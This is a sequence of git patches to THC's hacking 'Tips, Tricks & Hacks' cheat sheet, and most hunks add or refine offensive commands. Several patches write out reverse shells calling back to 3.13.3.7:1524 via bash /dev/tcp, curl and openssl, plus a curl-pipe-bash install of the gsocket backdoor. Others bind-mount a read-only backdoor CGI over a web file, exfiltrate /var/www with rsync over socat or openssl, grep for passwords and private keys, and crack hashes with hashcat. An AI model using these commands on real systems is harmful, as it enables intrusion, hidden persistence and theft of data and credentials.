From 4b441ebf16f0747856f3ffce60e2520c3efeee99 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 27 Dec 2023 09:38:07 +0000
Subject: [PATCH 01/25] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 3626160..10f299b 100644
--- a/README.md
+++ b/README.md
@@ -2077,7 +2077,7 @@ Telegram Channels
Mindmaps & Knowledge
1. [Compass Sec Cheat Sheets](https://github.com/CompassSecurity/Hacking_Tools_Cheat_Sheet)
2. [Network Pentesting](https://github.com/wearecaster/NetworkNightmare/blob/main/NetworkNightmare_by_Caster.png)
-1. [Active Directory](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2022_11.svg)
+1. [Active Directory](https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2023_02.svg)
**13.ii. Cool Linux commands**
From 700dece34888b64a6b1008d13a3f55081f99090e Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 1 Jan 2024 12:21:27 +0000
Subject: [PATCH 02/25] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 10f299b..6218b00 100644
--- a/README.md
+++ b/README.md
@@ -1583,7 +1583,7 @@ wfind() {
arr=("$@")
while [[ ${#arr[@]} -gt 0 ]]; do
dir=${arr[${#arr[@]}-1]}
- unset 'arr[${#arr[@]}-1]'
+ unset "arr[${#arr[@]}-1]"
find "$dir" -maxdepth 1 -type d -writable -ls 2>/dev/null
IFS=$'\n' arr+=($(find "$dir" -mindepth 1 -maxdepth 1 -type d ! -writable 2>/dev/null))
done
From 3f3e93334e95bfb4a30d8d3ff792a2c3c6207365 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 6 Jan 2024 05:57:42 +0000
Subject: [PATCH 03/25] Update README.md
---
README.md | 11 +++++++++++
1 file changed, 11 insertions(+)
diff --git a/README.md b/README.md
index 6218b00..5fdb952 100644
--- a/README.md
+++ b/README.md
@@ -79,6 +79,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [Restore the date of a file](#restore-timestamp)
1. [Clean logfile](#shell-clean-logs)
1. [Hide files from a User without root privileges](#shell-hide-files)
+ 1. [Make a file immutable](#perm-files)
1. [Crypto](#crypto)
1. [Generate quick random Password](#gen-password)
1. [Linux transportable encrypted filesystems](#crypto-filesystem)
@@ -1679,6 +1680,16 @@ mkdir $'\t'
cd $'\t'
```
+
+**8.v. Make a file immuteable**
+
+This will redirect `/var/www/cgi/blah.cgi` to `/boot/backdoor.cgi`. The file `blah.cgi` can not be modified or removed (unless unmounted).
+```sh
+# /boot/backdoor.cgi contains our backdoor
+touch /var/www/cgi/blah.cgi
+mount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi
+```
+
---
## 9. Crypto
From 43c9f686b45b9f4cfc65fbc6a4ebd4e23253eebf Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sun, 7 Jan 2024 07:04:07 +0000
Subject: [PATCH 04/25] Update README.md
---
README.md | 5 ++---
1 file changed, 2 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index 5fdb952..da7ca8e 100644
--- a/README.md
+++ b/README.md
@@ -1613,10 +1613,9 @@ shred -z foobar.txt
```sh
## SHRED without shred command
-shred()
-{
+shred() {
[[ -z $1 || ! -f "$1" ]] && { echo >&2 "shred [FILE]"; return 255; }
- dd bs=1k count=$(du -sk ${1:?} | cut -f1) if=/dev/urandom >"$1"
+ dd status=none bs=1k count=$(du -sk ${1:?} | cut -f1) if=/dev/urandom >"$1"
rm -f "${1:?}"
}
shred foobar.txt
From 2332745d1e83f7c405cf44dc40bf2c7a43485f2e Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Thu, 18 Jan 2024 08:33:55 +0000
Subject: [PATCH 05/25] Update README.md
---
README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/README.md b/README.md
index da7ca8e..193e411 100644
--- a/README.md
+++ b/README.md
@@ -1994,6 +1994,7 @@ OpSec
5. [EFF](https://www.eff.org/) - Clever advise for freedom figthers.
Exploits
+1. [SploitScan](https://github.com/xaitax/SploitScan) - Exploit Score & PoC search
1. [Traitor](https://github.com/liamg/traitor) - Tries various exploits/vulnerabilities to gain root (LPE)
1. [PacketStorm](https://packetstormsecurity.com) - Our favorite site ever since we shared a Pizza with fringe[at]dtmf.org in NYC in 2000
1. [ExploitDB](https://www.exploit-db.com) - Also includes metasploit db and google hacking db
From b78f3dc7c579d9e14f4245dbcf5c2c624c5939d1 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Thu, 18 Jan 2024 08:35:33 +0000
Subject: [PATCH 06/25] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 193e411..fabf789 100644
--- a/README.md
+++ b/README.md
@@ -1994,7 +1994,7 @@ OpSec
5. [EFF](https://www.eff.org/) - Clever advise for freedom figthers.
Exploits
-1. [SploitScan](https://github.com/xaitax/SploitScan) - Exploit Score & PoC search
+1. [SploitScan](https://github.com/xaitax/SploitScan) - Exploit Score & PoC search (by xaitax)
1. [Traitor](https://github.com/liamg/traitor) - Tries various exploits/vulnerabilities to gain root (LPE)
1. [PacketStorm](https://packetstormsecurity.com) - Our favorite site ever since we shared a Pizza with fringe[at]dtmf.org in NYC in 2000
1. [ExploitDB](https://www.exploit-db.com) - Also includes metasploit db and google hacking db
From 54a9be22e8e6f4be25994a4faef494f06bd5b2ca Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Fri, 19 Jan 2024 17:02:10 +0000
Subject: [PATCH 07/25] Update README.md
---
README.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index fabf789..8d9543e 100644
--- a/README.md
+++ b/README.md
@@ -1428,8 +1428,8 @@ stty raw -echo opost; fg
# On target host
export SHELL=/bin/bash
export TERM=xterm-256color
-reset
-stty rows 24 columns 120
+reset -I
+stty -echo;printf "\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '{ printf "rows "$3" cols "$2; }')
# Pimp up your prompt
PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '
```
From d56dcab72d13ee8c6600c73e0315bb92c1981d4f Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Fri, 19 Jan 2024 17:02:42 +0000
Subject: [PATCH 08/25] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 8d9543e..09bccd1 100644
--- a/README.md
+++ b/README.md
@@ -1424,7 +1424,7 @@ python -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo opost; fg
```
-```
+```sh
# On target host
export SHELL=/bin/bash
export TERM=xterm-256color
From 43cafa42277e363685e1dc1ffc1bab1474717878 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 22 Jan 2024 09:25:27 +0000
Subject: [PATCH 09/25] Update README.md
---
README.md | 10 +++++++++-
1 file changed, 9 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 09bccd1..f231f08 100644
--- a/README.md
+++ b/README.md
@@ -1234,7 +1234,7 @@ curl -sF document=@file.zip "https://api.telegram.org/bot/sendDocu
**5.i.a. Reverse shell with gs-netcat (encrypted)**
-Use [gsocket deploy](https://gsocket.io/deploy). It spawns a fully functioning PTY reverse shell and using the Global Socket Relay network. It uses 'password hashes' instead of IP addresses to connect. This means that you do not need to run your own Command & Control server for the backdoor to connect back to. If netcat is a swiss army knife than gs-netcat is a german battle axe :>
+Use [gsocket deploy](https://gsocket.io/deploy). It spawns a fully functioning PTY reverse shell. Both, the YOU and the remote system, can be behind NAT and the traffic is routed via a relay network. It also supports file upload/download (Ctrl-e c) and alarms when the admin logs in. If netcat is a swiss army knife than gs-netcat is a german battle axe :>
```sh
X=ExampleSecretChangeMe bash -c "$(curl -fsSL https://gsocket.io/x)"
@@ -1255,6 +1255,12 @@ Start netcat to listen on port 1524 on your system:
```sh
nc -nvlp 1524
```
+After connection, [upgrade](#reverse-shell-interactive) your shell to a fully interactive PTY shell. Alternatively use [pwncat-cs](https://pwncat.org/) instead of netcat:
+```sh
+pwncat -lp 1524
+# Press "Ctrl-C" if pwncat gets stuck after "registerd new host ...".
+# Then type "back" to get the prompt off the remote shell.
+```
On the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt:
```sh
@@ -1271,6 +1277,7 @@ bash -c '(exec -a kqueue bash -i &>/dev/tcp/3.13.3.7/1524 0>&1) &'
Use [curlshell](https://github.com/SkyperTHC/curlshell). This also works through proxies and when direct TCP connection to the outside world is prohibited:
```sh
+# On YOUR workstation
# Generate SSL keys:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC"
# Start your listening server:
@@ -1297,6 +1304,7 @@ C="curl -Ns telnet://3.13.3.7:1524"; $C &1 | sh 2>&1 | $C >/dev/nul
**5.i.e. Reverse shell with OpenSSL (encrypted)**
```sh
+# On YOUR workstation:
# Generate SSL keys:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC"
# Start your listening server:
From 2778ca7bde8faf2532d8d5e5285da7a8b9144954 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 22 Jan 2024 09:30:44 +0000
Subject: [PATCH 10/25] Update README.md
---
README.md | 11 +++++++----
1 file changed, 7 insertions(+), 4 deletions(-)
diff --git a/README.md b/README.md
index f231f08..8585008 100644
--- a/README.md
+++ b/README.md
@@ -1258,8 +1258,8 @@ nc -nvlp 1524
After connection, [upgrade](#reverse-shell-interactive) your shell to a fully interactive PTY shell. Alternatively use [pwncat-cs](https://pwncat.org/) instead of netcat:
```sh
pwncat -lp 1524
-# Press "Ctrl-C" if pwncat gets stuck after "registerd new host ...".
-# Then type "back" to get the prompt off the remote shell.
+# Press "Ctrl-C" if pwncat gets stuck at "registerd new host ...".
+# Then type "back" to get the prompt of the remote shell.
```
On the remote system, this command will connect back to your system (IP = 3.13.3.7, Port 1524) and give you a shell prompt:
@@ -1309,10 +1309,13 @@ C="curl -Ns telnet://3.13.3.7:1524"; $C &1 | sh 2>&1 | $C >/dev/nul
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -sha256 -days 3650 -nodes -subj "/CN=THC"
# Start your listening server:
openssl s_server -port 1524 -cert cert.pem -key key.pem
+# Or pwncat:
+# pwncat -lp 1524 --ssl
```
+
```sh
-# On the target:
-{ openssl s_client -connect 3.13.3.7:1524 -quiet &- | sh 2>&3 >&3 3>&- ; } 3>&1 | :
+# On the target, start an openssl reverse shell as background process:
+({ openssl s_client -connect 3.13.3.7:1524 -quiet &- 2>/dev/null | sh 2>&3 >&3 3>&- ; } 3>&1 | : & )
```
From 4b96900e95b79f5f057fe0a12af19bd89da1fdf5 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 22 Jan 2024 09:42:59 +0000
Subject: [PATCH 11/25] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 8585008..29b9b82 100644
--- a/README.md
+++ b/README.md
@@ -1470,7 +1470,7 @@ or
bash -c "$(wget --no-check-certificate -qO- https://gsocket.io/x)"
```
-or deploy gsocket by running their own deployment server:
+or deploy gsocket by running your own deployment server:
```sh
LOG=results.log bash -c "$(curl -fsSL https://gsocket.io/xs)" # Notice '/xs' instead of '/x'
```
From 4f194c8f1f6b8b98e9220051b989a8c3de61bdeb Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 27 Jan 2024 09:13:06 +0000
Subject: [PATCH 12/25] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 29b9b82..d3a7958 100644
--- a/README.md
+++ b/README.md
@@ -749,7 +749,7 @@ timeout 5 bash -c "
Date: Wed, 31 Jan 2024 01:16:52 +0000
Subject: [PATCH 13/25] Update README.md
---
README.md | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/README.md b/README.md
index d3a7958..3fce5e8 100644
--- a/README.md
+++ b/README.md
@@ -1533,9 +1533,8 @@ Other methods:
Add this line to the beginning of any PHP file:
```php
-
+
```
-(Thanks @dono for making this 3 bytes smaller than the smallest)
Test the backdoor:
```sh
From 1ee6ebe8951ec485cc1dca82d89bf85227151501 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 31 Jan 2024 14:45:17 +0000
Subject: [PATCH 14/25] Update README.md
---
README.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 3fce5e8..0562f1f 100644
--- a/README.md
+++ b/README.md
@@ -1155,7 +1155,7 @@ The same encrypted (OpenSSL):
Receiver:
```posh
-openssl req -subj '/CN=thc/O=EXFIL/C=XX' -new -newkey rsa:2048 -sha256 -days 14 -nodes -x509 -keyout ssl.key -out ssl.crt
+openssl req -subj '/CN=example.com/O=EL/C=XX' -new -newkey ed25519 -days 14 -nodes -x509 -keyout ssl.key -out ssl.crt
cat ssl.key ssl.crt >ssl.pem
rm -f ssl.key ssl.crt
mkdir upload
@@ -1169,7 +1169,7 @@ Sender:
rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,cafile=ssl.pem,verify=0' #" -- ./warez 0:
# Using rsync + openssl
-rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername thc -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- ./warez 0:
+rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername example.com -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- ./warez 0:
```
Rsync can be combined to exfil via [https / cloudflared raw TCP tunnels](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service).
From d26fc018f0dd7eaa932c8f6fd69ea963a0d8c16b Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Wed, 31 Jan 2024 14:53:10 +0000
Subject: [PATCH 15/25] Update README.md
---
README.md | 12 +++++++++---
1 file changed, 9 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index 0562f1f..688cb4f 100644
--- a/README.md
+++ b/README.md
@@ -1159,6 +1159,7 @@ openssl req -subj '/CN=example.com/O=EL/C=XX' -new -newkey ed25519 -days 14 -nod
cat ssl.key ssl.crt >ssl.pem
rm -f ssl.key ssl.crt
mkdir upload
+cat ssl.pem
socat OPENSSL-LISTEN:31337,reuseaddr,fork,cert=ssl.pem,cafile=ssl.pem EXEC:"rsync --server -logtprR --safe-links --partial upload"
```
@@ -1166,10 +1167,15 @@ Sender:
```posh
# Copy the ssl.pem from the Receiver to the Sender and send directory named 'warez'
# Using rsync + socat-ssl
-rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,cafile=ssl.pem,verify=0' #" -- ./warez 0:
-
+up1() {
+ rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,cafile=ssl.pem,verify=0' #" -- "$@" 0:
+}
# Using rsync + openssl
-rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername example.com -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- ./warez 0:
+up2() {
+ rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername example.com -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- "$@" 0:
+}
+up1 /var/www/./warez
+up2 /var/www/./warez
```
Rsync can be combined to exfil via [https / cloudflared raw TCP tunnels](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service).
From 1025de0e592511b66c5b811f141f7a8b1e1b832f Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Fri, 2 Feb 2024 09:51:27 +0000
Subject: [PATCH 16/25] Update README.md
---
README.md | 10 +++++++++-
1 file changed, 9 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 688cb4f..25ad223 100644
--- a/README.md
+++ b/README.md
@@ -1609,7 +1609,7 @@ wfind() {
# Usage: wfind /etc /var /usr
```
-Find local passwords:
+Find local passwords (using noseyparker):
```sh
curl -fsSL https://github.com/praetorian-inc/noseyparker/releases/download/v0.16.0/noseyparker-v0.16.0-x86_64-unknown-linux-gnu.tar.gz | tar xvfz - --transform="flags=r;s|.*/||" --no-anchored --wildcards noseyparker && \
./noseyparker scan . && \
@@ -1617,6 +1617,14 @@ curl -fsSL https://github.com/praetorian-inc/noseyparker/releases/download/v0.16
```
(Or use [PassDetective](https://github.com/aydinnyunus/PassDetective) to find passwords in ~/.*history)
+Using `grep`:
+```sh
+# Find passwords (without garbage).
+grep -HEronasir '.{16}password.{,64}' .
+# Find TLS or OpenSSH keys:
+grep -r -F -- " PRIVATE KEY-----" .
+```
+
---
## 8. Shell Hacks
From 2d5ef92ea002eded6add9b5f7a7a58f2b755de40 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 3 Feb 2024 18:07:28 +0000
Subject: [PATCH 17/25] Update README.md
---
README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/README.md b/README.md
index 25ad223..31c86b9 100644
--- a/README.md
+++ b/README.md
@@ -1,6 +1,7 @@
# THC's favourite Tips, Tricks & Hacks (Cheat Sheet)
+https://thc.org/tips
https://tinyurl.com/thctips
A collection of our favourite tricks. Many of those tricks are not from us. We merely collect them.
From cdb3dfa7855877a4f1175f1b449ae4608f98a8da Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 5 Feb 2024 15:08:59 +0000
Subject: [PATCH 18/25] Update README.md
---
README.md | 7 ++-----
1 file changed, 2 insertions(+), 5 deletions(-)
diff --git a/README.md b/README.md
index 31c86b9..83cda57 100644
--- a/README.md
+++ b/README.md
@@ -607,17 +607,14 @@ DSTIP=1.2.3.4
DPORT=443
echo 1 >/proc/sys/net/ipv4/ip_forward
-iptables -t mangle -I PREROUTING -p tcp --dport ${FPORT:?} -m addrtype --dst-type LOCAL -j MARK --set-mark 1188
-iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark
+iptables -t mangle -C PREROUTING -j CONNMARK --restore-mark || iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark
+iptables -t mangle -A PREROUTING -p tcp --dport ${FPORT:?} -m addrtype --dst-type LOCAL -j MARK --set-mark 1188
iptables -t nat -I PREROUTING -p tcp -m mark --mark 1188 -j DNAT --to ${DSTIP:?}:${DPORT:?}
iptables -I FORWARD -m mark --mark 1188 -j ACCEPT
iptables -t nat -I POSTROUTING -m mark --mark 1188 -j MASQUERADE
iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark
-
-iptables -t mangle -I INPUT -m mark --mark 1188 -j ACCEPT
-iptables -t mangle -I INPUT -j CONNMARK --restore-mark
```
We use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks.
From 2f71273320dc08e8e961514787c5c4440e2e3b61 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 5 Feb 2024 17:13:22 +0000
Subject: [PATCH 19/25] Update README.md
---
README.md | 11 +++++++++++
1 file changed, 11 insertions(+)
diff --git a/README.md b/README.md
index 83cda57..72edae5 100644
--- a/README.md
+++ b/README.md
@@ -81,6 +81,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [Clean logfile](#shell-clean-logs)
1. [Hide files from a User without root privileges](#shell-hide-files)
1. [Make a file immutable](#perm-files)
+ 1. [Change user without sudo/su]
1. [Crypto](#crypto)
1. [Generate quick random Password](#gen-password)
1. [Linux transportable encrypted filesystems](#crypto-filesystem)
@@ -1711,6 +1712,16 @@ touch /var/www/cgi/blah.cgi
mount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi
```
+**8.vi. Change user without sudo/su**
+
+Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | convert - jpg:screenshot.jpg`)
+```bash
+U=$(id -u UserName) ### <-- Set UserName
+H="$(grep "$U" /etc/passwd | cut -d: -f6)"
+HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execl('/bin/bash', '-bash')"
+# change -bash to bash to not make this a login shell.
+```
+
---
## 9. Crypto
From 6c513a83c81b7ce3565f7e6e9081c2abbdb2021a Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 5 Feb 2024 17:14:19 +0000
Subject: [PATCH 20/25] Update README.md
---
README.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 72edae5..1264c37 100644
--- a/README.md
+++ b/README.md
@@ -81,7 +81,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [Clean logfile](#shell-clean-logs)
1. [Hide files from a User without root privileges](#shell-hide-files)
1. [Make a file immutable](#perm-files)
- 1. [Change user without sudo/su]
+ 1. [Change user without sudo/su](#nosudo)
1. [Crypto](#crypto)
1. [Generate quick random Password](#gen-password)
1. [Linux transportable encrypted filesystems](#crypto-filesystem)
@@ -1712,6 +1712,7 @@ touch /var/www/cgi/blah.cgi
mount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi
```
+
**8.vi. Change user without sudo/su**
Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | convert - jpg:screenshot.jpg`)
From a79c2c62744d3df228a03c6ab9341cfd18dbf171 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sun, 11 Feb 2024 12:02:37 +0000
Subject: [PATCH 21/25] Update README.md
---
README.md | 9 +++++++--
1 file changed, 7 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 1264c37..a9f00f6 100644
--- a/README.md
+++ b/README.md
@@ -751,7 +751,7 @@ HashCat is our go-to tool for everything else:
hashcat my-hash /usr/share/wordlists/rockyou.txt
```
-Or using a [7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010-days/10-days_7-16.hcmask) on GPU:
+Or using a [10-days 7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010-days/10-days_7-16.hcmask) on GPU:
```sh
curl -fsSL https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010-days/10-days_7-16.hcmask -o 10-days_7-16.hcmask
# -d2 == Use GPU #2 only (device #2)
@@ -759,8 +759,13 @@ curl -fsSL https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010
# -w1 == workload low (-w3 == high)
nice -n 19 hashcat -o cracked.txt my-hash.txt -w1 -a3 10-days_7-16.hcmask -O -d2
```
+Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions).
-Read the [FAQ](https://hashcat.net/wiki/doku.php?id=frequently_asked_questions) or use [Crackstation](https://crackstation.net), [shuck.sh](https://shuck.sh/), [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or crack on your own [AWS](https://akimbocore.com/article/hashcracking-with-aws/).
+Be aware that `$6$` hashes are SLOW. Even the [1-minute 7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/01%20instant_1-minute/1-minute_7-16.hcmask) would take many days on a 8xRTX4090 cluster to complete.
+
+Rent a GPU-Cluster at [vast.ai](https://www.vast.ai) and use [dizcza/docker-hashcat](https://hub.docker.com/r/dizcza/docker-hashcat) ([read more](https://adamsvoboda.net/password-cracking-in-the-cloud-with-hashcat-vastai/)).
+
+Otherwise, use [Crackstation](https://crackstation.net), [shuck.sh](https://shuck.sh/), [ColabCat/cloud](https://github.com/someshkar/colabcat)/[Cloudtopolis](https://github.com/JoelGMSec/Cloudtopolis) or crack on your own [AWS](https://akimbocore.com/article/hashcracking-with-aws/) instances.
**3.xi. Brute Force Passwords / Keys**
From 900bb69c7ff4fc4a16ec46c20e45992a46ab3ab7 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 19 Feb 2024 00:18:17 +0000
Subject: [PATCH 22/25] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index a9f00f6..a496ed4 100644
--- a/README.md
+++ b/README.md
@@ -1071,7 +1071,7 @@ gs-netcat >"FILENAME" # When prompted, enter the SECRET from the sender
#### Download from Server to Receiver:
```sh
## Spawn a temporary HTTP server and share the current working directory.
-python -m http.server 8080
+python -m http.server 8080 # --bind 127.0.0.1
```
```sh
From a8fd199ac9fa2b3489c5c6797246b61a36b6ccf3 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 20 Feb 2024 16:25:58 +0000
Subject: [PATCH 23/25] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index a496ed4..064817d 100644
--- a/README.md
+++ b/README.md
@@ -751,7 +751,7 @@ HashCat is our go-to tool for everything else:
hashcat my-hash /usr/share/wordlists/rockyou.txt
```
-Or using a [10-days 7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010-days/10-days_7-16.hcmask) on GPU:
+Or using a [10-days 7-16 char hashmask](https://github.com/sean-t-smith/Extreme_Breach_Masks/) on GPU:
```sh
curl -fsSL https://github.com/sean-t-smith/Extreme_Breach_Masks/raw/main/10%2010-days/10-days_7-16.hcmask -o 10-days_7-16.hcmask
# -d2 == Use GPU #2 only (device #2)
From bb9ecb4161f1fb1b5a87ccc311768e93103d453e Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 20 Feb 2024 16:34:15 +0000
Subject: [PATCH 24/25] Update README.md
---
README.md | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 064817d..03f8cae 100644
--- a/README.md
+++ b/README.md
@@ -1170,13 +1170,15 @@ socat OPENSSL-LISTEN:31337,reuseaddr,fork,cert=ssl.pem,cafile=ssl.pem EXEC:"rsyn
Sender:
```posh
# Copy the ssl.pem from the Receiver to the Sender and send directory named 'warez'
+IP=1.2.3.4
+PORT=31337
# Using rsync + socat-ssl
up1() {
- rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:1.2.3.4:31337,cert=ssl.pem,cafile=ssl.pem,verify=0' #" -- "$@" 0:
+ rsync -ahPRv -e "bash -c 'socat - OPENSSL-CONNECT:${IP:?}:${PORT:-31337},cert=ssl.pem,cafile=ssl.pem,verify=0' #" -- "$@" 0:
}
# Using rsync + openssl
up2() {
- rsync -ahPRv -e "bash -c 'openssl s_client -connect 1.2.3.4:31337 -servername example.com -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- "$@" 0:
+ rsync -ahPRv -e "bash -c 'openssl s_client -connect ${IP:?}:${PORT:-31337} -servername example.com -cert ssl.pem -CAfile ssl.pem -quiet 2>/dev/null' #" -- "$@" 0:
}
up1 /var/www/./warez
up2 /var/www/./warez
@@ -1185,6 +1187,8 @@ up2 /var/www/./warez
Rsync can be combined to exfil via [https / cloudflared raw TCP tunnels](https://iq.thc.org/tunnel-via-cloudflare-to-any-tcp-service).
(To exfil from Windows, use the rsync.exe from the [gsocket windows package](https://github.com/hackerschoice/binary/raw/main/gsocket/bin/gs-netcat_x86_64-cygwin_full.zip)). A noisier solution is [syncthing](https://syncthing.net/).
+Pro Tip: Lazy hackers just type `exfil` on segfault.net.
+
---
### 4.ix. File transfer - using WebDAV
From fe895c5bde1af4231e39558e0948a2fa6ba5491a Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 20 Feb 2024 16:35:48 +0000
Subject: [PATCH 25/25] Update README.md
---
README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/README.md b/README.md
index 03f8cae..bcda80c 100644
--- a/README.md
+++ b/README.md
@@ -1159,6 +1159,7 @@ The same encrypted (OpenSSL):
Receiver:
```posh
+# use rsa:2048 if ed25519 is not supported (e.g. rsync connection error)
openssl req -subj '/CN=example.com/O=EL/C=XX' -new -newkey ed25519 -days 14 -nodes -x509 -keyout ssl.key -out ssl.crt
cat ssl.key ssl.crt >ssl.pem
rm -f ssl.key ssl.crt